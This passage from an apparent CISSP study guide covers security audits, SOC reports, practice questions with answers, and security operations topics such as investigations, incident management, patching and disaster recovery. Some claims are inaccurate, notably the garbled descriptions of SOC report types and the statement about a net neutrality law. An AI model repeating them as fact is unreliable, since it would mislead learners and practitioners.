and external interfaces. The server interfaces include the hardware, software and networking infrastructure to support the server. For applications, external interfaces can be a web browser or operating system, and internal components can include plug-ins, error handling and more. You should be aware of the different testing types for each system. 63 6.3 Collect security process data Organizations should collect data about policies and procedures and review it on a regular basis to ensure that the established goals are being met. Additionally, they should consider whether new risks have appeared since the creation of the process that must now be addressed.  Account management. Every organization should have a defined procedure for maintaining accounts that have access to systems and facilities. This doesn’t just mean documenting the creation of a user account, but can include when that account expires and the logon hours of the account. This should also be tied to facilities access. For example, was an employee given a code or key card to access the building? Are there hours that the access method is also prevented? There should also be separate processes for managing accounts of vendors and other people who might need temporary access.  Management review and approval. Management plays a key role in ensuring that these processes are distributed to employees, and that they are followed. The likelihood of a process or procedure succeeding without management buy-in is minimal. The teams that are collecting the process data should have the full support of the management team, including periodic reviews and approval of all data collection techniques.  Key performance and risk indicators. You can associate key performance and risk indicators with the data that is being collected. The risk indicators can be used to measure how risky the process, account, facility access or other action is to the organization. The performance indicators can be used to ensure that a process or procedure is successful and measure how much impact it has on the organization’s day-to-day operations.  Backup verification data. A strict and rigorous backup procedure is almost useless without verification of the data. Backups should be restored regularly to ensure that the data can be recovered successfully. When using replication, you should also implement integrity checks to ensure that the data was not corrupted during the transfer process.  Training and awareness. Training and awareness of security policies and procedures are half the battle when implementing or maintaining these policies. This extends beyond the security team that is collecting the data, and can impact every employee or user in an organization. The table below outlines different levels of training that can be used for an organization. Awareness Training Education Knowledge level The “what” of a policy or procedure The “how” of a policy or procedure The “why” of a policy or procedure Objective Knowledge retention Ability to complete a task Understanding the big picture Typical training methods Self-paced e-learning, web-based training (WBT), videos Instructor-led training (ILT), demos, hands-on activities Seminars and research Testing method Short quiz after training Application-level problem solving Design-level problem solving and architecture exercises 64  Disaster recovery (DR) and business continuity (BC). Two areas that must be heavily documented are disaster recovery and business continuity. Because these processes are infrequently used, the documentation plays a key role helping teams understand what to do and when to do it. As part of your security assessment and testing, you should review DR and BC documentation to ensure it is complete and represents a disaster from beginning to end. The procedures should adhere to the company’s established security policies and answer questions such as, how do administrators obtain system account passwords during a DR scenario? If some sensitive information is required during a DR or BC tasks, you need to ensure this information is both secure and accessible to those who need it. 6.4 Analyze test output and generate reports The teams that analyze the security procedures should be aware of the output and reporting capabilities for the data. Any information that is of concern must be reported to the management teams immediately so that they are aware of possible risks or alerts. The level of detail given to the management teams might vary depending on their roles and involvement. The type of auditing being performed can also determine the type of reports that must be used. For example, for an SSAE 16 audit, a Service Organization Control (SOC) report is required. There are four types of SOC reports:  SOC 1 Type 1. This report outlines the findings of an audit, as well as the completeness and accuracy of the documented controls, systems and facilities.  SOC 1 Type 2. This report includes the Type 1 report, along with information about the effectiveness of the procedures and controls in place for the immediate future.  SOC 2. This report includes the testing results of an audit.  SOC 3. This report provides general audit results with a datacenter certification level. 6.5 Conduct or facilitate security audits Security audits should occur on a routine basis according to the policy set in place by the organization. Internal auditing typically occurs more frequently than external or third-party auditing.  Internal. Security auditing should be an ongoing task of the security team. There are dozens of software vendors that simplify the process of aggregating log data. The challenge is knowing what to look for once you have collected the data.  External. External security auditing should be performed on a set schedule. This could be aligned with financial reporting each quarter or some other business-driven reason.  Third-party. Third-party auditing can be performed on a regular schedule in addition to external auditing. The goal of third-party auditing can either be to provide checks and balances for the internal and external audits, or to perform a more in-depth auditing procedure. 65 Domain 6 Review Questions Read and answer the following questions. If you do not get at least one them correct, spend more time with the subject. Then move on to Domain 7. 1. Your company recently implemented a pre-release version of a new email application. The company wants to perform testing against the application and has issued the following requirements:  Testers must test all aspects of the email application.  Testers must not have any knowledge of the new e-mail environment. Which type of testing should you use to meet the company requirements? a. White box testing b. Black box testing c. Negative testing d. Static testing e. Dynamic testing 2. You are working with your company to validate assessment and audit strategies. The immediate goal is to ensure that all auditors are following the processes and procedures defined by the company's audit policies. Which type of audit should you use for this scenario? a. Internal b. External c. Third-party d. Hybrid 3. Your company is planning to perform some security control testing. The following requirements have been established:  The team must try to bypass controls in the systems.  The team can use technical methods or non-technical methods in attempting to bypass controls. Which type of testing should you perform to meet the requirements? a. Vulnerability assessment testing b. Penetration testing c. Synthetic transaction testing d. Misuse case testing 66 Answers to Domain 6 Review Questions 1. Answer: B Explanation: In black box testing, testers have no knowledge of the system they are testing. 2. Answer: C Explanation: Third-party testing is specifically geared to ensuring that the other auditors (internal and external) are properly following your policies and procedures. 3. Answer: B Explanation: In a penetration test, teams attempt to bypass controls, whether technically or non-technically. 67 Domain 7. Security Operations This domain is focused on the day-to-day tasks of securing your environment. If you are in a role outside of operations (such as in engineering or architecture), you should spend extra time in this section to ensure familiarity with the information. You’ll notice more hands-on sections in this domain, specifically focused on how to do things instead of the design or planning considerations found in previous domains. 7.1 Understand and support investigations This section discusses concepts related to supporting security investigations. You should be familiar with the processes in an investigation. You should know all the fundamentals of collecting and handling evidence, documenting your investigation, reporting the information, performing root cause analysis, and performing digital forensic tasks.  Evidence collection and handling. Like a crime scene investigation, a digital investigation involving potential computer crimes has rules and processes to ensure that evidence is usable in court. At a high level, you need to ensure that your handling of the evidence doesn’t alter the integrity of the data or environment. To ensure consistency and integrity of data, your company should have an incident response policy that outlines the steps to take in the event of a security incident, with key details such as how employees report an incident. Additionally, the company should have an incident response team that is familiar with the incident response policy and that represents the key areas of the organization (management, HR, legal, IT, etc.). The team doesn’t have to be dedicated but instead could have members who have regular work and are called upon only when necessary. With evidence collection, documentation is key. The moment a report comes in, the documentation process begins. As part of the documentation process, you must document each time somebody handles evidence and how that evidence was gathered and moved around; this is known as the chain of custody. Interviewing is often part of evidence collection. If you need to interview an internal employee as a suspect, an HR representative should be present. Consider recording all interviews, if that’s legal.  Reporting and documenting. There are two types of reporting: one for IT with technical details and one for management without technical details. Both are critical. The company must be fully aware of the incident and kept up to date as the investigation proceeds. Capture everything possible, including dates, times and pertinent details.  Investigative techniques. When an incident occurs, you need to find out how it happened. A part of this process is the root cause analysis, in which you pinpoint the cause (for example, a user clicked on a malicious link in an email, or a web server was missing a security update and an attacker used an unpatched vulnerability to compromise the server). Often, teams are formed to help determine the root cause. Incident handling is the overall management of the investigation — think of it as project management but on a smaller level. NIST and others have published guidelines for incident handling. At a high level, it includes the following steps: detect, analyze, contain, eradicate and recover. Of course, there are other smaller parts to incident handling, such as preparation and postincident analysis, like a “lessons learned” review meeting.  Digital forensics tools, tactics and procedures. Forensics should preserve the crime scene, though in digital forensics, this means the computers, storage and other devices, instead of a room and a weapon, for example. Other investigators should be able to perform their own analyses and come to the same conclusions because they 68 have the same data. This requirement impacts many of the operational procedures. In particular, instead of performing scans, searches and other actions against the memory and storage of computers, you should take images of the memory and storage, so you can thoroughly examine the contents without modifying the originals. For network forensics, you should work from copies of network captures acquired during the incident. For embedded devices, you need to take images of memory and storage and note the configuration. In all cases, leave everything as is, although your organization might have a policy to have everything removed from the network or completely shut down. New technologies can introduce new challenges in this area because sometimes existing tools don’t work (or don’t work as efficiently) with new technologies. For example, when SSDs were introduced, they presented challenges for some of the old ways of working with disk drives. 7.2 Understand the requirements for different types of investigations Your investigation will vary based on the type of incident you are investigating. For example, if you work for a financial company and there was a compromise of a financial system, you might have a regulatory investigation. If a hacker defaces your company website, you might have a criminal investigation. Each type of investigation has special considerations:  Administrative. The primary purpose of an administrative investigation is to provide the appropriate authorities with all relevant information so they can determine what, if any, action to take. Administrative investigations are often tied to HR scenarios, such as when a manager has been accused of improprieties.  Criminal. A criminal investigation occurs when a crime has been committed and you are working with a law enforcement agency to convict the alleged perpetrator. In such a case, it is common to gather evidence for a court of law, and to have to share the evidence with the defense. Therefore, you need to gather and handle the information using methods that ensure that the evidence can be used in court . We covered some key points earlier, such as chain of custody. Be sure to remember that in a criminal case, a suspect must be proven guilty beyond a reasonable doubt. This is more difficult than showing a preponderance of evidence, which is often the standard in a civil case.  Civil. In a civil case, one person or entity sues another person or entity; for example, one company might sue another for a trademark violation. A civil case typically seeks monetary damages, not incarceration or a criminal record. As we just saw, the burden of proof is less in a civil case.  Regulatory. A regulatory investigation is conducted by a regulating body, such as the Securities and Exchange Commission (SEC) or Financial Industry Regulatory Authority (FINRA), against an organization suspected of an infraction. In such cases, the organization is required to comply with the investigation, for example, by not hiding or destroying evidence.  Industry standards. An industry standards investigation is intended to determine whether an organization is adhering to a specific industry standard or set of standards, such as logging and auditing failed logon attempts. Because industry standards represent well-understood and widely implemented best practices, many organizations try to adhere to them even when they are not required to do so in order to reduce security, operational and other risks. 69 7.3 Conduct logging and monitoring activities This section covers logging and monitoring.  Intrusion detection and prevention. There are two technologies that you can use to detect and prevent intrusions. You should use both. Some solutions combine them into a single software package or appliance.  An intrusion detection system (IDS) is a technology (typically software or an appliance) that attempts to identify malicious activity in your environment. Solutions often rely on patterns, signatures, or anomalies. There are multiple types of IDS solutions. For example, there are solutions specific to the network (network IDS or NIDS) and others specific to computers (host-based IDS or HIDS).  An intrusion prevention system (IPS) can help block an attack before it gets inside your network. In the worst case, it can identify an attack in progress. Like an IDS, an IPS is often a software or appliance. However, an IPS is typically placed in line on the network so it can analyze traffic coming into or leaving the network, whereas an IDS typically sees intrusions after they’ve occurred.  Security information and event management (SIEM). Companies have security information stored in logs across multiple computers and appliances. Often, the information captured in the logs is so extensive that it can quickly become hard to manage and use. Many companies deploy a security information and event management (SIEM) solution to centralize the log data and make it simpler to work with. For example, if you need to find all failed logon attempts on your web servers, you could look through the logs on each web server individually. But if you have a SIEM solution, you can go to a portal and search across all web servers with a single query. A SIEM is a critical technology in large and security-conscious organizations.  Continuous monitoring. Continuous monitoring is the process of streaming information related to the security of the computing environment in real time (or close to real time). Some SIEM solutions offer continuous monitoring or at least some features of continuous monitoring.  Egress monitoring. Egress monitoring is the monitoring of data as it leaves your network. One reason is to ensure that malicious traffic doesn’t leave the network (for example, in a situation in which a computer is infected and trying to spread malware to hosts on the internet). Another reason is to ensure that sensitive data (such as customer information or HR information) does not leave the network unless authorized. The following strategies can help with egress monitoring:  Data loss prevention (DLP) solutions focus on reducing or eliminating sensitive data leaving the network.  Steganography is the art of hiding data inside another file or message. For example, steganography enables a text message to be hidden inside a picture file (such as a .jpg). Because the file appears innocuous, it can be difficult to detect.  Watermarking is the act of embedding an identifying marker in a file. For example, you can embed a company name in a customer database file or add a watermark to a picture file with copyright information. 70 7.4 Securely provision resources This section covers provisioning of resources. Therefore, we cover the topics from a provisioning standpoint, rather than an overall management or design standpoint.  Asset inventory. You need to have a method for maintaining an accurate inventory of your company’s assets. For example, you need to know how many computers you have and how many installations of each licensed software application you have. Asset inventory helps organizations protect physical assets from theft, maintain software licensing compliance, and account for the inventory (for example, depreciating the assets). There are other benefits too. For example, if a vulnerability is identified in a specific version of an application, you can use your asset inventory to figure out whether you have any installations of the vulnerable version.  Asset management. Assets, such as computers, desks and software applications, have a lifecycle — simply put, you buy it, you use it and then you retire it. Asset management is the process of managing that lifecycle. You keep track of all your assets, including when you got it, how much you paid for it, its support model and when you need to replace it. For example, asset management can help your IT team figure out which laptops to replace during the next upgrade cycle. It can also help you control costs by finding overlap in hardware, software or other assets.  Configuration management. Configuration management helps you standardize a configuration across your devices. For example, you can use configuration management software to ensure that all desktop computers have anti-virus software and the latest patches, and that the screen will automatically be locked after 5 minutes of inactivity. The configuration management system should automatically remediate most changes users make to a system. The benefits of configuration management include having a single configuration (for example, all servers have the same baseline services running and the same patch level), being able to manage many systems as a single unit (for example, you can deploy an updated anti-malware application to all servers the same amount of time it takes to deploy it to a single server), and being able to report on the configuration throughout your network (which can help to identify anomalies). Many configuration management solutions are OS-agnostic, meaning that they can be used across Windows, Linux and Mac computers. Without a configuration management solution, the chances of having a consistent and standardized deployment plummets, and you lose the efficiencies of configuring many computers as a single unit. 7.5 Understand and apply foundational security operations concepts This section covers some of the foundational items for security operations. Many of these concepts apply to several other sections on the exam. You should have a very firm grasp of these topics so that you can navigate them effectively throughout the other sections.  Need-to-know and least privilege. Access should be given based on a need to know. For example, a system administrator who is asked to disable a user account doesn’t need to know that the user was terminated, and a systems architect who is asked to evaluate an IT inventory list doesn’t need to know that his company is considering acquiring another company. The principle of least privilege means giving users the fewest privileges they need to perform their job tasks; entitlements are granted only after a specific privilege is deemed necessary. It is a good practice and almost always a recommend practice. Two other concepts are important here:  Aggregation. The combining of multiple things into a single unit is often used in role-based access control. 71  Transitive trust. From a Microsoft Active Directory perspective, a root or parent domain automatically trusts all child domains. Because of the transitivity, all child domains also trust each other. Transitivity makes it simpler to have trusts. But it is important to be careful. Consider outside of Active Directory: If Chris trusts Terry and Pat trusts Terry, should Chris trust Pat? Probably not. In high-security environments, it isn’t uncommon to see non-transitive trusts used, depending on the configuration and requirements.  Separation of duties and responsibilities. Separation of duties refers to the process of separating certain tasks and operations so that a single person doesn’t control all them. For example, you might dictate that one person is the security administrator and another is the email administrator. Each has administrative access to only their area. You might have one administrator responsible for authentication and another responsible for authorization. The goal with separation of duties is to make it more difficult to cause harm to the organization (via destructive actions or data loss, for example). With separation of duties, it is often necessary to have two or more people working together (colluding) to cause harm to the organization. Separation of duties is not always practical, though. For example, in a small company, you might only have one person doing all the IT work, or one person doing all the accounting work. In such cases, you can rely on compensating controls or external auditing to minimize risk.  Privileged account management. A special privilege is a right not commonly given to people. For example, certain IT staff might be able to change other users’ passwords or restore a system backup, and only certain accounting staff can sign company checks. Actions taken using special privileges should be closely monitored. For example, each user password reset should be recorded in a security log along with pertinent information about the task: date and time, source computer, the account that had its password changed, the user account that performed the change, and the status of the change (success or failure). For high-security environments, you should consider a monitoring solution that offers screen captures or screen recording in addition to the text log.  Job rotation. Job rotation is the act of moving people between jobs or duties. For example, an accountant might move from payroll to accounts payable and then to accounts receivable. The goal of job rotation is to reduce the length of one person being in a certain job (or handling a certain set of responsibilities) for too long, which minimizes the chances of errors or malicious actions going undetected. Job rotation can also be used to cross-train members of teams to minimize the impact of an unexpected leave of absence.  Information lifecycle. Information lifecycle is made up of the following phases:  Collect data. Data is gathered from sources such as log files and inbound email, and when users produce data such as a new spreadsheet.  Use data. Users read, edit and share data.  Retain data (optional). Data is archived for the time required by the company’s data retention policies. For example, some companies retain all email data for 7 years by archiving the data to long-term storage until the retention period has elapsed.  Legal hold (occasional). A legal hold requires you to maintain one or more copies of specified data in an unalterable form during a legal scenario (such as a lawsuit) or an audit or government investigation. A legal hold is often narrow; for example, you might have to put a legal hold on all email to or from the accounts payable department. In most cases, a legal hold is invisible to users and administrators who are not involved in placing the hold. 72  Delete data. The default delete action in most operating systems is not secure: The data is marked as deleted, but it still resides on the disks and can be easily recovered with off-the-shelf software. To have an effective information lifecycle, you must use secure deletion techniques such as disk wiping (for example, by overwriting the data multiple times), degaussing and physical destruction (shredding a disk).  Service-level agreements (SLAs). An SLA is an agreement between a provider (which could be an internal department) and the business that defines when a service provided by the department is acceptable. For example, the email team might have an SLA that dictates that they will provide 99.9% uptime each month or that spam email will represent 5% or less of the email in user mailboxes. SLAs can help teams design appropriate solutions. For example, if an SLA requires 99.9% uptime, a team might focus on high availability and site resiliency. Sometimes, especially with service providers, not adhering to SLAs can result in financial penalties. For example, an internet service provider (ISP) might have to reduce its monthly connection charges if it does not meet its SLA. 7.6 Apply resource protection techniques This section covers media, hardware and software management. We will look at some key tips for managing media and using asset management for software and hardware.  Media management. Media management is the act of maintaining media for your software and data. This includes operating system images, installation files and backup media. Any media that you use in your organization potentially falls under this umbrella. There are some important media management concepts to know:  Source files. If you rely on software for critical functions, you need to be able to reinstall that software at any time. Despite the advent of downloadable software, many organizations rely on legacy software that they purchased on disk years ago and that is no longer available for purchase. To protect your organization, you need to maintain copies of the media along with copies of any license keys.  Operating system images. You need a method to manage your operating system images so that you can maintain clean images, update the images regularly (for example, with security updates), and use the images for deployments. Not only should you maintain multiple copies at multiple sites, but you should also test the images from time to time. While you can always rebuild an image from your step-by-step documentation, that lost time could cost your company money during an outage or other major issue.  Backup media. Backup media is considered sensitive media. While many organizations encrypt backups on media, you still need to treat the backup media in a special way to reduce the risk of it being stolen and compromised. Many companies lock backup media in secure containers and store the containers in a secure location. It is also common to use third-party companies to store backup media securely in off-site facilities.  Hardware and software asset management. At first glance, asset management might not seem related to security operations, but it actually is. For example, if a vendor announces a critical vulnerability in a specific version of a product that allows remote code execution, you need to quickly act to patch your devices — which means you need to be able to quickly figure out if you have any devices that are vulnerable. You can’t do that without effective asset management (and, in some cases, configuration management). Here are some key tasks for an asset management solution: 73  Capture as much data as you reasonably can. You need to know where a given product is installed. But you also need to know when it was installed (for example, whether a vulnerable version was installed after the company announced the vulnerability), the precise version number (because without that, you might not be able to effectively determine whether you are susceptible), and other details.  Have a robust reporting system. You need to be able to use all the asset management data you collect, so you need a robust reporting system that you can query on demand. For example, you should be able to quickly get a report listing all computers running a specific version of a specific software product. And you should then be able to filter that data to only corporate-owned devices or laptop computers.  Integrate asset management with other automation software. If your asset management solution discovers 750 computers running a vulnerable version of a piece of software, you need an automated way to update the software to the latest version. You can do that by integrating your asset management system with your configuration management system. Some vendors offer an all-in-one solution that performs both asset management and configuration management. 7.7 Conduct incident management Incident management is the management of incidents that are potentially damaging to an organization, such as a distributed denial of service attack. Not all incidents are computer-related; for example, a break-in at your CEO’s office is also an incident.  Detection. It is critical to be able to detect incidents quickly because they often become more damaging at time passes. It is important to have a robust monitoring and intrusion detection solution in place. Other parts of a detection system include security cameras, motion detectors, smoke alarms and other sensors. If there is a security incident, you want to be alerted (for example, if an alarm is triggered at your corporate headquarters over a holiday weekend).  Response. When you receive a notification about an incident, you should start by verifying the incident. For example, if an alarm was triggered at a company facility, a security guard can physically check the surroundings for an intrusion and check the security cameras for anomalies. For computer-related incidents, it is advisable to keep compromised systems powered on to gather forensic data. Along with the verification process, during the response phase you should also kick off the initial communication with teams or people that can help with mitigation. For example, you should contact the information security team initially during a denial-of-service attack.  Mitigation. The next step is to contain the incident. For example, if a computer has been compromised and is actively attempting to compromise other computers, the compromised computer should be removed from the network to mitigate the damage.  Reporting. Next, you should disseminate data about the incident. You should routinely inform the technical teams and the management teams about the latest findings regarding the incident.  Recovery. In the recovery phase, you get the company back to regular operations. For example, for a compromised computer, you re-image it or restore it from a backup. For a broken window, you replace it. 74  Remediation. In this phase, you take additional steps to minimize the chances of the same or a similar attack being successful. For example, if you suspect that an attacker launched attacks from the company’s wireless network, you should update the wireless password or authentication mechanism. If an attacker gained access to sensitive plain text data during an incident, you should encrypt the data in the future.  Lessons learned. During this phase, all team members who worked on the security incident gather to review the incident. You want to find out which parts of the incident management were effective and which were not. For example, you might find that your security software detected an attack immediately (effective) but you were unable to contain the incident without powering off all the company’s computers (less effective). The goal is to review the details to ensure that the team is better prepared for the next incident. 7.8 Operate and maintain detective and preventative measures This section deals with the hands-on work of operating and maintaining security systems to block attacks on your company’s environment or minimize their impact.  Firewalls. While operating firewalls often involves adding and editing rules and reviewing logs, there are other tasks that are important, too. For example, review the firewall configuration change log to see which configuration settings have been changed recently.  Intrusion detection and prevention systems. You need to routinely evaluate the effectiveness of your IDS and IPS systems. You also need to review and fine-tune the alerting functionality. If too many alerts are sent (especially false positive or false negatives), administrators will often ignore or be slow to respond to alerts, causing response to a real incident alert to be delayed.  Whitelisting and blacklisting. Whitelisting is the process of marking applications as allowed, while blacklisting is the process of marking applications as disallowed. Whitelisting and blacklisting can be automated. It is common to whitelist all the applications included on a corporate computer image and disallow all others.  Security services provided by third parties. Some vendors offer security services that ingest the security-related logs from your entire environment and handle detection and response using artificial intelligence or a large network operations center. Other services perform assessments, audits or forensics. Finally, there are third-party security services that offer code review, remediation or reporting.  Sandboxing. Sandboxing is the act of totally segmenting an environment or a computer from your production networks and computers; for example, a company might have a non-production environment on a physically separate network and internet connection. Sandboxes help minimize damage to a production network. Because computers and devices in a sandbox aren’t managed in the same way as production computers, they are often more vulnerable to attacks and malware. By segmenting them, you reduce the risk of those computers infecting your production computers. Sandboxes are also often used for honeypots and honeynets, as explained in the next bullet.  Honeypots and honeynets. A honeypot or a honeynet is a computer or network purposely deployed to lure would-be attackers and record their actions. The goal is to understand their methods and use that knowledge to design more secure computers and networks. There are important and accepted uses; for example, an anti-virus software company might use honeypots to validate and strengthen their anti-virus and anti-malware software. 75 However, honeypots and honeynets have been called unethical because of their similarities to entrapment. While many security-conscious organizations stay away from running their own honeypots and honeynets, they can still take advantage of the information gained from other companies that use them.  Anti-malware. Anti-malware is a broad term that often includes anti-virus, anti-spam and anti-malware (with malware being any other code, app or service created to cause harm). You should deploy anti-malware to every possible device, including servers, client computers, tablets and smartphones, and be vigilant about product and definition updates. 7.9 Implement and support patch and vulnerability management While patch management and vulnerability management seem synonymous, there are some key differences:  Patch management. The updates that software vendors provide to fix security issues or other bugs are called patches. Patch management is the process of managing all the patches in your environment, from all vendors. A good patch management system tests and implements new patches immediately upon release to minimize exposure. Many security organizations have released studies claiming that the single most important part of securing an environment is having a robust patch management process that moves swiftly. A patch management system should include the following processes:  Automatic detection and download of new patches. Detection and downloading should occur at least once per day. You should monitor the detection of patches so that you are notified if detection or downloading is not functional.  Automatic distribution of patches. Initially, deploy patches to a few computers in a lab environment and run them through system testing. Then expand the distribution to a larger number of non-production computers. If everything is functional and no issues are found, distribute the patches to the rest of the nonproduction environment and then move to production. It is a good practice to patch your production systems within 7 days of a patch release. In critical scenarios where there is known exploit code for a remote code execution vulnerability, you should deploy patches to your production systems the day of the patch release to maximize security.  Reporting on patch compliance. Even if you might have an automatic patch distribution method, you need a way to assess your overall compliance. Do 100% of your computers have the patch? Or 90%? Which specific computers are missing a specific patch? Reporting can be used by the management team to evaluate the effectiveness of a patch management system.  Automatic rollback capabilities. Sometimes, vendors release patches that create problems or have incompatibilities. Those issues might not be evident immediately but instead show up days later. Ensure you have an automated way of rolling back or removing the patch across all computers. You don’t want to figure that out a few minutes before you need to do it.  Vulnerability management. A vulnerability is a way in which your environment is at risk of being compromised or degraded. The vulnerability can be due to a missing patch. But it can also be due to a misconfiguration or other factors. For example, when SHA-1 certificates were recently found to be vulnerable to attack, many companies 76 suddenly found themselves vulnerable and needed to take action (by replacing the certificates). Many vulnerability management solutions can scan the environment looking for vulnerabilities. Such solutions complement, but do not replace, patch management systems and other security systems (such as anti-virus or anti-malware systems). Be aware of the following definitions:  Zero-day vulnerability. A vulnerability is sometimes known about before a patch is available. Such zeroday vulnerabilities can sometimes be mitigated with an updated configuration or other temporary workaround until a patch is available. Other times, no mitigations are available and you have to be especially vigilant with logging and monitoring until the patch is available.  Zero-day exploit. Attackers can release code to exploit a vulnerability for which no patch is available. These zero-day exploits represent one of the toughest challenges for organizations trying to protect their environments. 7.10 Understand and participate in change management processes Change management represents a structured way of handling changes to an environment. The goals include providing a process to minimize risk, improving the user experience, and providing consistency with changes. While many companies have their own change management processes, there are steps that are common across most organizations:  Identify the need for a change. For example, you might find out that your routers are vulnerable to a denial of service attack and you need to update the configuration to remedy that.  Test the change in a lab. Test the change in a non-production environment to ensure that the proposed change does what you think it will. Also use the test to document the implementation process and other key details.  Put in a change request. A change request is a formal request to implement a change. You specify the proposed date of the change (often within a pre-defined change window), the details of the work, the impacted systems, notification details, testing information, rollback plans and other pertinent information. The goal is to have enough information in the request that others can determine whether there will be any impact to other changes or conflicts with other changes and be comfortable moving forward. Many companies require a change justification for all changes.  Obtain approval. Often, a change control board (a committee that runs change management), will meet weekly or monthly to review change requests. The board and the people that have submitted the changes meet to discuss the change requests, ask questions and vote on approval. If approval is granted, you move on to the next step. If not, you restart the process.  Send out notifications. A change control board might send out communications about upcoming changes. In some cases, the implementation team handles the communications. The goal is to communicate to impacted parties, management and IT about the upcoming changes. If they see anything unusual after a change is made, the notifications will help them begin investigating by looking at the most recent changes.  Perform the change. While most companies have defined change windows, often on the weekend, sometimes a change can’t wait for that window (such as an emergency change). During the change process, capture the existing 77 configuration, capture the changes and steps, and document all pertinent information. If a change is unsuccessful, perform the rollback plan steps.  Send out “all clear” notifications. These notifications indicate success or failure. 7.11 Implement recovery strategies A recovery operation takes place following an outage, security incident or other disaster that takes an environment down or compromises it in a way that requires restoration. Recovery strategies are important because they have a big impact on how long your organization will be down or have a degraded environment, which has an impact on the company’s bottom line. Note that this section focuses on strategies rather than tactics, so be thinking from a design perspective, not from a day-day-day operational perspective.  Backup storage strategies. While most organizations back up their data in some way, many do not have an official strategy or policy regarding where the backup data is stored or how long the data is retained. In most cases, backup data should be stored offsite. Offsite backup storage provides the following benefits:  If your data center is destroyed (earthquake, flood, fire), your backup data isn’t destroyed with it. In some cases, third-party providers of off-site storage services also provide recovery facilities to enable organizations to recover their systems to the provider’s environment.  Offsite storage providers provide environmentally sensitive storage facilities with high-quality environmental characteristics around humidity, temperature and light. Such facilities are optimal for longterm backup storage.  Offsite storage providers provide additional services that your company would have to manage otherwise, such as tape rotation (delivery of new tapes and pickup of old tapes), electronic vaulting (storing backup data electronically), and organization (cataloging of all media, dates and times).  Recovery site strategies. When companies have multiple data centers, they can often use one as a primary data center and one another as a recovery site (either a cold standby site or a warm standby site). An organization with 3 or more data centers can have a primary data center, a secondary data center (recovery site) and regional data centers. With the rapid expansion of public cloud capabilities, having a public cloud provider be your recovery site is feasible and reasonable. One key thing to think about is cost. While cloud storage is inexpensive and therefore your company can probably afford to store backup data there, trying to recover your entire data center from the public cloud might not be affordable or fast enough.  Multiple processing sites. Historically, applications and services were highly available within a site such as a data center, but site resiliency was incredibly expensive and complex. Today, it is common for companies to have multiple data centers, and connectivity between the data centers is much faster and less expensive. Because of these advances, many applications provide site resiliency with the ability to have multiple instances of an application spread across 3 or more data centers. In some cases, application vendors are recommending backupfree designs in which an app and its data are stored in 3 or more locations, with the application handling the multisite syncing. The public cloud can be the third site, which is beneficial for companies that lack a third site or that have apps and services already in the public cloud. 78  System resilience, high availability, quality of service (QoS) and fault tolerance. To prepare for the exam, it is important to know the differences between these related terms:  System resilience. Resilience is the ability to recover quickly. For example, site resilience means that if Site 1 goes down, Site 2 quickly and seamlessly comes online. Similarly, with system resilience, if a disk drive fails, another (spare) disk drive is quickly and seamlessly added to the storage pool. Resilience often comes from having multiple functional components (for example, hardware components).  High availability. While resilience is about recovering with a short amount of downtime or degradation, high availability is about having multiple redundant systems that enable zero downtime or degradation for a single failure. For example, if you have a highly available database cluster, one of the nodes can fail and the database cluster remains available without an outage or impact. While clusters are often the answer for high availability, there are many other methods available too. For instance, you can provide a highly available web application by using multiple web servers without a cluster. Many organizations want both high availability and resiliency.  Quality of service (QoS). QoS is a technique that helps enable specified services to receive a higher quality of service than other specified services. For example, on a network, QoS might provide the highest quality of service to the phones and the lowest quality of service to social media. QoS has been in the news because of the net neutrality discussion taking place in the United States. The new net neutrality law gives ISPs a right to provide higher quality of services to a specified set of customers or for a specified service on the internet. For example, an ISP might opt to use QoS to make its own web properties perform wonderfully while ensuring the performance of its competitors’ sites is subpar.  Fault tolerance. As part of providing a highly available solution, you need to ensure that your computing devices have multiple components — network cards, processors, disk drives, etc. —of the same type and kind to provide fault tolerance. Fault tolerance, by itself, isn’t valuable. For example, imagine a server with fault-tolerant CPUs. The server’s power supply fails. Now the server is done even though you have fault tolerance. As you can see, you must account for fault tolerance across your entire system and across your entire network. 7.12 Implement disaster recovery (DR) recovery processes Trying to recover from a disaster without a documented disaster recovery processes is difficult, if not impossible. Thus, you should establish clear disaster recovery processes to minimize the effort and time required to recover from a disaster. Testing the plans is also important and is discussed separately in the next section (7.13).  Response. When you learn about an incident, the first step is to determine whether it requires a disaster recovery procedure. Timeliness is important because if a recovery is required, you need to begin recovery procedures as soon as possible. Monitoring and alerting play a big part in enabling organizations to respond to disasters faster.  Personnel. In many organizations, there is a team dedicated to disaster recovery planning, testing and implementation. They maintain the processes and documentation. In a disaster recovery scenario, the disaster recovery team should be contacted first so they can begin communicating to the required teams. In a real disaster, communicating with everybody will be difficult and, in some cases, not possible. Sometimes, companies use 79 communication services or software to facilitate emergency company-wide communications or mass communications with personnel involved in the disaster recovery operation.  Communications. There are two primary forms of communication that occur during a disaster recovery operation, as well as a third form of communication that is sometimes required:  Communications with the recovery personnel. In many disaster scenarios, email is down, phones are down, and instant messaging services are down. If the disaster hasn’t taken out cell service, you can rely on communications with smart phones (SMS messages, phone calls).  Communications with the management team and the business. As the recovery operation begins, the disaster recovery team must stay in regular contact with the business and the management team. The business and management team need to understand the severity of the disaster and the approximate time to recover. As things progress, they must be updated regularly.  Communications with the public. In some cases, a company experiencing a large-scale disaster must communicate with the public, for example, a service provider, a publicly traded company, or a provider of services to consumers. At a minimum, the communication must indicate the severity of the incident, when service is expected to resume, and any actions consumers need to take.  Assessment. During the response phase, the teams verified that recovery procedures had to be initiated. In the assessment phase, the teams dive deeper to look at the specific technologies and services to find out details of the disaster. For example, if during the response phase, the team found email to be completely down, then they might check to find out if other technologies are impacted along with email.  Restoration. During the restoration phase, the team performs the recovery operations to bring all services back to their normal state. In many situations, this means failing over to a secondary data center. In others, it might mean recovering from backups. After a successful failover to a secondary data center, it is common to start planning the failback to the primary data center once it is ready. For example, if the primary data center flooded, you would recover to the second data center, recover from the flood, then fail back to the primary data center.  Training and awareness. To maximize the effectiveness of your disaster recovery procedures, you need to have a training and awareness campaign. Sometimes, technical teams will gain disaster recovery knowledge while attending training classes or conferences for their technology. But they also need training about your organization’s disaster recovery procedures and policies. Performing routine tests of your disaster recovery plans can be part of such training. That topic is covered next, in section 7.13. 7.13 Test disaster recovery plans (DRP) Testing your disaster recovery plans is an effective way to ensure your company is ready for a real disaster. It also helps minimize the amount of time it takes to recover from a real disaster, which can benefit a company financially. There are multiple ways of testing your plan:  Read-through/tabletop. The disaster recovery teams (for example, server, network, security, database, email, etc.) gather and the disaster recovery plan is read. Each team validates that their technologies are present and the timing is appropriate to ensure that everything can be recovered. If not, changes are made. A read-through can 80 often help identify ordering issues (for example, trying to recover email before recovering DNS) or 